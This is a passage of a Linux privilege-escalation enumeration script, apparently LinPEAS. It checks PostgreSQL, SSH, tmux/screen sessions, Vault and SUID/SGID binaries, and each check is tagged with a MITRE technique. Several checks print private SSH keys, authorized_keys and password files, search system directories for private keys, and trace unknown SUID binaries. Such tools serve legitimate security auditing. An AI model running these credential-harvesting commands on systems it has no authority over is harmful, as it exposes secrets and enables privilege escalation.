  11373   print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ "
  11374   if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.*,${SED_RED},"
  11375   else echo_no
  11376   fi
  11377   print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... "
  11378   if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  11379   else echo_no
  11380   fi
  11381   print_list "PostgreSQL connection to template1 using pgsql/NOPASS ........... "
  11382   if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
  11383   else echo_no
  11384   fi
  11385   echo ""
  11386 fi
  11387 
  11388 fi
  11389 
  11390 if check_mitre_filter "T1505.001"; then
  11391 if [ "$DEBUG" ] || { [ "$TIMEOUT" ] && [ "$(command -v psql 2>/dev/null || echo -n '')" ]; }; then
  11392   print_2title "PostgreSQL event trigger ownership & postgres_fdw hooks" "T1505.001"
  11393   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#postgresql-event-triggers"
  11394   psql_bin="$(command -v psql 2>/dev/null || echo -n '')"
  11395   if [ "$TIMEOUT" ] && [ "$psql_bin" ]; then
  11396     psql_evt_output="$($TIMEOUT 5 "$psql_bin" -w -X -q -A -t -d postgres -c "WITH evt AS ( SELECT e.evtname, e.evtenabled, pg_get_userbyid(e.evtowner) AS trig_owner, tr.rolsuper AS trig_owner_super, n.nspname || '.' || p.proname AS function_name, pg_get_userbyid(p.proowner) AS func_owner, fr.rolsuper AS func_owner_super FROM pg_event_trigger e JOIN pg_proc p ON e.evtfoid = p.oid JOIN pg_namespace n ON p.pronamespace = n.oid LEFT JOIN pg_roles tr ON tr.oid = e.evtowner LEFT JOIN pg_roles fr ON fr.oid = p.proowner ) SELECT evtname || '|' || evtenabled || '|' || COALESCE(trig_owner,'?') || '|' || COALESCE(CASE WHEN trig_owner_super THEN 'yes' ELSE 'no' END,'unknown') || '|' || function_name || '|' || COALESCE(func_owner,'?') || '|' || COALESCE(CASE WHEN func_owner_super THEN 'yes' ELSE 'no' END,'unknown') FROM evt WHERE COALESCE(trig_owner_super,false) = false OR COALESCE(func_owner_super,false) = false;" 2>&1)"
  11397     psql_evt_status=$?
  11398     if [ $psql_evt_status -eq 0 ]; then
  11399       if [ "$psql_evt_output" ]; then
  11400         echo "Non-superuser-owned event triggers were found (trigger|enabled?|owner|owner_is_super|function|function_owner|fn_owner_is_super):" | sed -${E} "s,.*,${SED_RED},"
  11401         printf "%s\n" "$psql_evt_output" | while IFS='|' read evtname enabled owner owner_is_super func func_owner func_owner_is_super; do
  11402           case "$enabled" in
  11403             O) enabled="enabled" ;;
  11404             D) enabled="disabled" ;;
  11405             *) enabled="status_$enabled" ;;
  11406           esac
  11407           echo "  - $evtname ($enabled) uses $func owned by $func_owner (superuser:$func_owner_is_super); trigger owner: $owner (superuser:$owner_is_super)" | sed -${E} "s,superuser:no,${SED_RED},g"
  11408         done
  11409       else
  11410         echo "No event triggers owned by non-superusers were returned." | sed -${E} "s,.*,${SED_GREEN},"
  11411       fi
  11412     else
  11413       psql_evt_err_line=$(printf '%s\n' "$psql_evt_output" | head -n1)
  11414       echo "Could not query pg_event_trigger (psql exit $psql_evt_status): $psql_evt_err_line" | sed -${E} "s,.*,${SED_YELLOW},"
  11415     fi
  11416   else
  11417     if ! [ "$TIMEOUT" ]; then
  11418       echo_not_found "timeout"
  11419     fi
  11420     if ! [ "$psql_bin" ]; then
  11421       echo_not_found "psql"
  11422     fi
  11423   fi
  11424   postgres_fdw_dirs="/etc/postgresql /var/lib/postgresql /var/lib/postgres /usr/lib/postgresql /usr/local/lib/postgresql /opt/supabase /opt/postgres /srv/postgres"
  11425   postgres_fdw_hits=""
  11426   for d in $postgres_fdw_dirs; do
  11427     if [ -d "$d" ]; then
  11428       old_ifs="$IFS"
  11429       IFS="\n"
  11430       for f in $(find "$d" -maxdepth 5 -type f \( -name '*postgres_fdw*.sql' -o -name '*postgres_fdw*.psql' -o -name 'after-create.sql' \) 2>/dev/null); do
  11431         if [ -f "$f" ] && grep -qiE "alter[[:space:]]+role[[:space:]]+postgres[[:space:]]+superuser" "$f" 2>/dev/null; then
  11432           postgres_fdw_hits="$postgres_fdw_hits\n$f"
  11433         fi
  11434       done
  11435       IFS="$old_ifs"
  11436     fi
  11437   done
  11438   if [ "$postgres_fdw_hits" ]; then
  11439     echo "Detected postgres_fdw custom scripts granting postgres SUPERUSER (check for SupaPwn-style window):" | sed -${E} "s,.*,${SED_RED},"
  11440     printf "%s\n" "$postgres_fdw_hits" | sed "s,^,  - ,"
  11441   fi
  11442 fi
  11443 echo ""
  11444 
  11445 fi
  11446 
  11447 if check_mitre_filter "T1613,T1611"; then
  11448 if ! [ "$SEARCH_IN_FOLDER" ]; then
  11449   runc=$(command -v runc || echo -n '')
  11450   if [ "$runc" ] || [ "$DEBUG" ]; then
  11451     print_2title "Checking if runc is available" "T1613,T1611"
  11452     print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#runc--privilege-escalation"
  11453     if [ "$runc" ]; then
  11454       echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
  11455     fi
  11456     echo ""
  11457   fi
  11458 fi
  11459 
  11460 fi
  11461 
  11462 if check_mitre_filter "T1556"; then
  11463 if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ "$DEBUG" ] ; then
  11464   print_2title "S/Key authentication" "T1556"
  11465   printf "System supports$RED S/Key$NC authentication\n"
  11466   if ! [ -d /etc/skey/ ]; then
  11467     echo "${GREEN}S/Key authentication enabled, but has not been initialized"
  11468   elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then
  11469     echo "${RED}/etc/skey/ is writable by you"
  11470     ls -ld /etc/skey/
  11471   else
  11472     ls -ld /etc/skey/ 2>/dev/null
  11473   fi
  11474   echo ""
  11475 fi
  11476 
  11477 fi
  11478 
  11479 if check_mitre_filter "T1563"; then
  11480 if (command -v screen >/dev/null 2>&1 || [ -d "/run/screen" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then
  11481   print_2title "Searching screen sessions" "T1563"
  11482   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-shell-sessions"
  11483   screensess=$(screen -ls 2>/dev/null)
  11484   screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null)
  11485   screen -v
  11486   printf "$screensess\n$screensess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
  11487   find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do
  11488     echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW},"
  11489   done
  11490   if [ -r "/etc/passwd" ]; then
  11491     print_3title "Checking other users screen sessions" "T1563"
  11492     cut -d: -f1,7 /etc/passwd 2>/dev/null | grep "sh$" | cut -d: -f1 | grep -v "^$USER$" | while read u; do
  11493       uscreen=$(screen -ls "${u}/" 2>/dev/null | grep -v "No Sockets found" | grep -v "^$")
  11494       if [ "$uscreen" ]; then
  11495         echo "User $u screen sessions:"
  11496         printf "%s\n" "$uscreen" | sed -${E} "s,.*,${SED_RED},"
  11497       fi
  11498     done
  11499   fi
  11500   echo ""
  11501 fi
  11502 
  11503 fi
  11504 
  11505 if check_mitre_filter "T1552.001"; then
  11506 SPLUNK_BIN="$(command -v splunk 2>/dev/null || echo -n '')"
  11507 if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then
  11508   print_2title "Searching uncommon passwd files (splunk)" "T1552.001"
  11509   if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi
  11510   printf "%s\n" "$PSTORAGE_SPLUNK" | grep -v ".htpasswd" | sort | uniq | while read f; do
  11511     if [ -f "$f" ] && ! [ -x "$f" ]; then
  11512       echo "passwd file: $f" | sed "s,$f,${SED_RED},"
  11513       cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED},"
  11514     fi
  11515   done
  11516   echo ""
  11517 fi
  11518 
  11519 fi
  11520 
  11521 if check_mitre_filter "T1552.004,T1021.004"; then
  11522 print_2title "Searching ssl/ssh files" "T1552.004,T1021.004"
  11523 if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi
  11524 if ! [ "$SEARCH_IN_FOLDER" ]; then
  11525   sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)"
  11526   hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
  11527   hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
  11528   agent_sockets=$(find /run/user /tmp -type s \( -path "/run/user/*/ssh-*/agent.*" -o -name "ssh-agent.sock" -o -path "/tmp/ssh-*" \) 2>/dev/null)
  11529   writable_agents=$(find /tmp /etc /home /run/user \
  11530     \( -type s -a \( -name "agent.*" -o -name "ssh-agent.sock" -o -path "*/ssh-*/agent.*" -o -name "*gpg-agent*" \) \
  11531     -a \( \( -user "$USER" \) -o \( -perm -o=w \) -o \( -perm -g=w -a \( $wgroups \) \) \) \) 2>/dev/null)
  11532 else
  11533   sshconfig="$(ls ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null)"
  11534   hostsdenied="$(ls ${ROOT_FOLDER}etc/hosts.denied 2>/dev/null)"
  11535   hostsallow="$(ls ${ROOT_FOLDER}etc/hosts.allow 2>/dev/null)"
  11536   agent_sockets=$(find "${ROOT_FOLDER}"tmp "${ROOT_FOLDER}"run -type s \( -name "agent.*" -o -name "ssh-agent.sock" \) 2>/dev/null)
  11537   writable_agents=$(find "${ROOT_FOLDER}" \
  11538     \( -type s -a \( -name "agent.*" -o -name "ssh-agent.sock" -o -path "*/ssh-*/agent.*" -o -name "*gpg-agent*" \) \
  11539     -a \( \( -user "$USER" \) -o \( -perm -o=w \) -o \( -perm -g=w -a \( $wgroups \) \) \) \) 2>/dev/null)
  11540 fi
  11541 if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then
  11542   print_2title "Analyzing SSH Files (limit 70)"
  11543     if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_dsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_dsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_dsa.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,id_dsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11544     if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"id_rsa.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "id_rsa*"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "id_rsa.*$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,id_rsa.*$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11545     if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"known_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "known_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "known_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,known_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11546     if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_hosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_hosts"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_hosts$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_hosts$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo "";
  11547     if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"authorized_keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "authorized_keys"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "authorized_keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,authorized_keys$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,command=.*,${SED_RED},g" | sed -${E} "s,from=[\w\._\-]+,${SED_GOOD},g"; done; echo "";
  11548     if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"\.pub$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pub"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "\.pub$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pub$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "command=.*" | sed -${E} "s,command=.*,${SED_RED},g"; done; echo "";
  11549 fi
  11550 
  11551 grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFile" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
  11552 if ! [ "$SEARCH_IN_FOLDER" ]; then
  11553   if [ "$TIMEOUT" ]; then
  11554     privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /etc 2>/dev/null)
  11555     privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
  11556     privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /root 2>/dev/null)
  11557     privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /mnt 2>/dev/null)
  11558   else
  11559     privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
  11560     privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
  11561   fi
  11562 else
  11563   # If $SEARCH_IN_FOLDER lets just search for private keys in the whole firmware
  11564   privatekeyfilesetc=$(timeout 120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' "$ROOT_FOLDER" 2>/dev/null)
  11565 fi
  11566 if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
  11567   echo ""
  11568   print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED},"
  11569   if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi
  11570   if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi
  11571   if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi
  11572   if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi
  11573   echo ""
  11574 fi
  11575 if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then
  11576   print_3title "Some certificates were found (out limited):" "T1552.004,T1021.004"
  11577   printf "$certsb4_grep\n" | head -n 20
  11578   printf "$PSTORAGE_CERTSBIN\n" | head -n 20
  11579     echo ""
  11580 fi
  11581 if [ "$PSTORAGE_CERTSCLIENT" ]; then
  11582   print_3title "Some client certificates were found:" "T1552.004,T1021.004"
  11583   printf "$PSTORAGE_CERTSCLIENT\n"
  11584   echo ""
  11585 fi
  11586 if [ "$PSTORAGE_SSH_AGENTS" ]; then
  11587   print_3title "Some SSH Agent files were found:" "T1552.004,T1021.004"
  11588   printf "$PSTORAGE_SSH_AGENTS\n"
  11589   echo ""
  11590 fi
  11591 if [ "$agent_sockets" ]; then
  11592   print_3title "Potential SSH agent sockets were found:" "T1552.004,T1021.004"
  11593   printf "%s\n" "$agent_sockets" | sed -${E} "s,.*,${SED_RED},"
  11594   echo ""
  11595 fi
  11596 if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
  11597   print_3title "Listing SSH Agents" "T1552.004,T1021.004"
  11598   ssh-add -l
  11599   echo ""
  11600 fi
  11601 if gpg-connect-agent "keyinfo --list" /bye 2>/dev/null | grep "D - - 1"; then
  11602   print_3title "Listing gpg keys cached in gpg-agent" "T1552.004,T1021.004"
  11603   gpg-connect-agent "keyinfo --list" /bye
  11604   echo ""
  11605 fi
  11606 if [ "$writable_agents" ]; then
  11607   print_3title "Writable ssh and gpg agents" "T1552.004,T1021.004"
  11608   printf "%s\n" "$writable_agents"
  11609 fi
  11610 if [ "$PSTORAGE_SSH_CONFIG" ]; then
  11611   print_3title "Some home ssh config file was found" "T1552.004,T1021.004"
  11612   printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done
  11613   echo ""
  11614 fi
  11615 if [ "$hostsdenied" ]; then
  11616   print_3title "/etc/hosts.denied file found, read the rules:" "T1552.004,T1021.004"
  11617   printf "$hostsdenied\n"
  11618   cat " ${ROOT_FOLDER}etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
  11619   echo ""
  11620 fi
  11621 if [ "$hostsallow" ]; then
  11622   print_3title "/etc/hosts.allow file found, trying to read the rules:" "T1552.004,T1021.004"
  11623   printf "$hostsallow\n"
  11624   cat " ${ROOT_FOLDER}etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
  11625   echo ""
  11626 fi
  11627 if [ "$sshconfig" ]; then
  11628   echo ""
  11629   echo "Searching inside /etc/ssh/ssh_config for interesting info"
  11630   grep -v "^#"  ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
  11631 fi
  11632 echo ""
  11633 
  11634 fi
  11635 
  11636 if check_mitre_filter "T1563"; then
  11637 tmuxdefsess=$(tmux ls 2>/dev/null)
  11638 tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
  11639 tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null)
  11640 if ([ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then
  11641   print_2title "Searching tmux sessions"$N
  11642   print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-shell-sessions"
  11643   tmux -V
  11644   printf "$tmuxdefsess\n$tmuxnondefsess\n$tmuxsess2" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m,"
  11645   find /tmp -type s -path "/tmp/tmux*" -not -user $USER '(' '(' -perm -o=w ')' -or  '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do
  11646     echo "Other user tmux socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW},"
  11647   done
  11648   echo ""
  11649 fi
  11650 
  11651 fi
  11652 
  11653 if check_mitre_filter "T1552.004"; then
  11654 if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then
  11655   print_2title "Searching Vault-ssh files" "T1552.004"
  11656   printf "$PSTORAGE_VAULT_SSH_HELPER\n"
  11657   printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done
  11658   echo ""
  11659   vault secrets list 2>/dev/null
  11660   printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
  11661 fi
  11662 echo ""
  11663 
  11664 fi
  11665 
  11666 if check_mitre_filter "T1556"; then
  11667 if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ]; then
  11668   print_2title "YubiKey authentication" "T1556"
  11669   printf "System supports$RED YubiKey authentication\n"
  11670   if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then
  11671     echo "${RED}/var/db/yubikey/ is writable by you"
  11672     ls -ld /var/db/yubikey/
  11673   else
  11674     ls -ld /var/db/yubikey/ 2>/dev/null
  11675   fi
  11676   echo ""
  11677 fi
  11678 
  11679 fi
  11680 
  11681 fi
  11682 
  11683 fi
  11684 echo ''
  11685 echo ''
  11686 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
  11687 
  11688 if echo $CHECKS | grep -q interesting_perms_files; then
  11689 if check_mitre_filter "T1552.001,T1083,T1574.009,T1574.010,T1548.001,T1222,T1068,T1574.006,T1546.004,T1543.002,T1518.001"; then
  11690 print_title "Files with Interesting Permissions"
  11691 if check_mitre_filter "T1548.001"; then
  11692 print_2title "SUID - Check easy privesc, exploits and write perms" "T1548.001"
  11693 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid"
  11694 if ! [ "$STRINGS" ]; then
  11695   echo_not_found "strings"
  11696 fi
  11697 if ! [ "$STRACE" ]; then
  11698   echo_not_found "strace"
  11699 fi
  11700 suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
  11701 printf "%s\n" "$suids_files" | while read s; do
  11702   [ -z "$s" ] && continue
  11703   s=$(ls -lahtr "$s")
  11704   #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
  11705   if echo "$s" | grep -qE "^total"; then break; fi
  11706   sname="$(echo $s | awk '{print $9}')"
  11707   if [ "$sname" = "."  ] || [ "$sname" = ".."  ]; then
  11708     true #Don't do nothing
  11709   elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
  11710     echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
  11711   elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
  11712     echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  11713   else
  11714     c="a"
  11715     for b in $sidB; do
  11716       if echo "$sname" | grep -q $(echo $b | cut -d % -f 1); then
  11717         echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m&  --->  $(echo $b | cut -d % -f 2)${C}[0m,"
  11718         c=""
  11719         break;
  11720       fi
  11721     done;
  11722     if [ "$c" ]; then
  11723       if echo "$sname" | grep -qE "$sidG1" || echo "$sname" | grep -qE "$sidG2" || echo "$sname" | grep -qE "$sidG3" || echo "$sname" | grep -qE "$sidG4" || echo "$sname" | grep -qE "$sidVB" || echo "$sname" | grep -qE "$sidVB2"; then
  11724         echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
  11725       else
  11726         echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED},"
  11727         printf $ITALIC
  11728         if ! [ "$FAST" ]; then
  11729           if [ "$STRINGS" ]; then
  11730             $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
  11731               sline_first="$(echo "$sline" | cut -d ' ' -f1)"
  11732               if echo "$sline_first" | grep -qEv "$cfuncs"; then
  11733                 if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
  11734                   if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
  11735                     printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
  11736                   fi
  11737                 elif echo "$sline_first" | grep -q "/" && [ -d "$(dirname "$sline_first")" ] && [ -w "$(dirname "$sline_first")" ]; then #If path does not exist but can be created
  11738                   printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can create it inside writable dir $RED$(dirname "$sline_first")$NC$ITALIC (strings line: $sline) (https://tinyurl.com/suidpath)\n"
  11739                 else #If not a path
  11740                   if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
  11741                     printf "$ITALIC  --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
  11742                   fi
  11743                 fi
  11744               fi
  11745             done
  11746           fi
  11747           if [ "$LDD" ] || [ "$READELF" ]; then
  11748             echo "$ITALIC  --- Checking for writable dependencies of $sname...$NC"
  11749           fi
  11750           if [ "$LDD" ]; then
  11751             "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
  11752           fi
  11753           if [ "$READELF" ]; then
  11754             "$READELF" -d "$sname" | grep PATH | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
  11755           fi
  11756           if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ -x "$sname" ]; then
  11757             printf $ITALIC
  11758             echo "----------------------------------------------------------------------------------------"
  11759             echo "  --- Trying to execute $sname with strace in order to look for hijackable libraries..."
  11760             OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
  11761             export LD_LIBRARY_PATH=""
  11762             timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
  11763             printf $NC
  11764             export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
  11765             echo "----------------------------------------------------------------------------------------"
  11766             echo ""
  11767           fi
  11768         fi
  11769       fi
  11770     fi
  11771   fi
  11772 done;
  11773 echo ""
  11774 
  11775 fi
  11776 
  11777 if check_mitre_filter "T1548.001"; then
  11778 print_2title "SGID" "T1548.001"
  11779 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid"
  11780 sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
  11781 printf "%s\n" "$sgids_files" | while read s; do
  11782   [ -z "$s" ] && continue
  11783   s=$(ls -lahtr "$s")
  11784   #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
  11785   if echo "$s" | grep -qE "^total";then break; fi
  11786   sname="$(echo $s | awk '{print $9}')"
  11787   if [ "$sname" = "."  ] || [ "$sname" = ".."  ]; then
  11788     true #Don't do nothing
  11789   elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
  11790     echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
  11791   elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
  11792     echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
  11793   else
  11794     c="a"
  11795     for b in $sidB; do
  11796       if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then
  11797         echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m&  --->  $(echo $b | cut -d % -f 2)${C}[0m,"
  11798         c=""
  11799         break;
  11800       fi
  11801     done;
  11802     if [ "$c" ]; then
  11803       if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
  11804         echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
  11805       else
  11806         echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED},"
  11807         printf $ITALIC
  11808         if ! [ "$FAST" ]; then
  11809           if [ "$STRINGS" ]; then
  11810             $STRINGS "$sname" | sort | uniq | while read sline; do
  11811               sline_first="$(echo $sline | cut -d ' ' -f1)"
  11812               if echo "$sline_first" | grep -qEv "$cfuncs"; then
  11813                 if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
  11814                   if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
